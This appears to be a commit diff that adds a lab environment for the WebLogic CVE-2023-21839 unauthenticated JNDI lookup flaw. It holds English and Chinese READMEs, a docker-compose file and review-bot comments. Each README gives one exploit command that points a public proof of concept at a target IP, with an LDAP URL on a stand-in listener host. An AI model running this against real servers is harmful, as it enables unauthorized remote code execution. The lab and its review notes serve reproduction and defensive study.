first commit
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary file not shown.

@@ -0,0 +1,37 @@
# WebLogic Pre-Auth Remote Command Execution (CVE-2023-21839)
[中文版本(Chinese version)](README.zh-cn.md)
Oracle WebLogic Server is a leading Java EE application server widely used in enterprise environments.
In the [Oracle Critical Patch Update Advisory - January 2023](https://www.oracle.com/security-alerts/cpujan2023.html), Oracle fixed a critical vulnerability (CVE-2023-21839) affecting WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.
CVE-2023-21839 allows unauthenticated remote attackers to perform JNDI lookup operations via the T3 or IIOP protocol without authorization. If the JDK version is too low or there are available deserialization gadgets (javaSerializedData) on the server, this can lead to remote code execution.
References:
- <https://www.oracle.com/security-alerts/cpujan2023.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
- <https://github.com/houqe/POC_CVE-2023-21839>
## Environment Setup
Start a Weblogic server 12.2.1.3 by executing the following command:
```
docker compose up -d
```
After the server starts, visit `http://your-ip:7001/console` to access the WebLogic admin console login page.
## Vulnerability Reproduction
You can use the public exploit from <https://github.com/houqe/POC_CVE-2023-21839> to reproduce the vulnerability.
```shell
python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
```
If the exploit is successful, you will see DNS queries or LDAP requests from the target server, as shown below:
![](1.png)
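Review bot: In the Vulnerability Reproduction section, the example command hard-codes `192.168.25.129` while Environment Setup uses `your-ip`, and `ldap://craft.ldap.tld/test` is never described as a placeholder for a listener the reader controls. Use `your-ip` in both places and say what the `-l` value stands for. The section ends at an observed DNS or LDAP request, which confirms the unauthenticated JNDI lookup but not the command execution named in the title, so state that limit explicitly. The README also gives no remediation line, and one sentence pointing to the January 2023 Critical Patch Update already linked above as the fix would close that gap. Minor: the first fence has no language tag while the second uses `shell`, and "Weblogic server" should read "WebLogic Server" to match the rest of the file.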

@@ -0,0 +1,35 @@
# WebLogic未授权远程代码执行漏洞 (CVE-2023-21839)
Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。
在[Oracle 2023年1月安全公告](https://www.oracle.com/security-alerts/cpujan2023.html)中Oracle修复了影响WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本的严重安全漏洞CVE-2023-21839。
该漏洞允许未授权远程攻击者通过T3或IIOP协议发起JNDI lookup操作。如果JDK版本过低或本地存在可用的反序列化gadgetjavaSerializedData攻击者可进一步实现远程代码执行RCE
参考链接:
- <https://www.oracle.com/security-alerts/cpujan2023.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
- <https://github.com/houqe/POC_CVE-2023-21839>
## 环境设置
执行以下命令启动WebLogic Server 12.2.1.3漏洞环境:
```
docker compose up -d
```
启动完成后,访问`http://your-ip:7001/console`可以看到WebLogic管理控制台登录页。
## 漏洞复现
你可以使用公开的POC工具<https://github.com/houqe/POC_CVE-2023-21839>进行漏洞复现。
```shell
python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
```
漏洞利用成功后可在DNSLog平台或LDAP服务端看到来自目标服务器的请求如下图所示
![](1.png)
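Review bot: Punctuation is missing in the description paragraph and in the result sentence of this file. `反序列化gadgetjavaSerializedData攻击者可进一步实现远程代码执行RCE` runs the parenthetical, the clause break and the abbreviation together where the English README has "gadgets (javaSerializedData)", the advisory sentence has no comma after the link, and the sentence after the command has no separators around `如下图所示`. Restore the parentheses and commas so both versions read the same. The command here also hard-codes `192.168.25.129` while the setup section uses `your-ip`. The English README links to `README.zh-cn.md`, but this file has no link back to it.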

@@ -0,0 +1,5 @@
services:
weblogic:
image: vulhub/weblogic:12.2.1.3-2018
ports:
- "7001:7001"
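Review bot: The `ports` entry `- "7001:7001"` publishes the listener on every host interface, and the README in this commit describes that port as reachable without authentication over T3 or IIOP. For a deliberately vulnerable image, either bind the mapping to loopback with `- "127.0.0.1:7001:7001"` or add a line to the README telling readers to run the environment only on an isolated host or network. If the `your-ip` access pattern in the README must keep working from another machine, document that trade-off next to the command.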